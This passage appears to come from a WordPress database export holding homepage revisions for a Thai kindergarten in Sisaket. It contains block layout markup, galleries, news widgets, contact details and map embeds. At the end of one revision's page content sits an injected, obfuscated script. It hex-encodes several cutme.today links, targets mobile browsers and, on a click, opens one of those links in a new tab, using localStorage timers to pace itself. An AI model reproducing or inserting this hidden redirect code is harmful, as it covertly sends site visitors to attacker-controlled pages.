{\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-23 14:31:44','2024-08-23 07:31:44','',19,'http://watprato.ssk.in.th/?p=207',0,'revision','',0),
(208,2,'2024-08-23 14:32:49','2024-08-23 07:32:49','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div 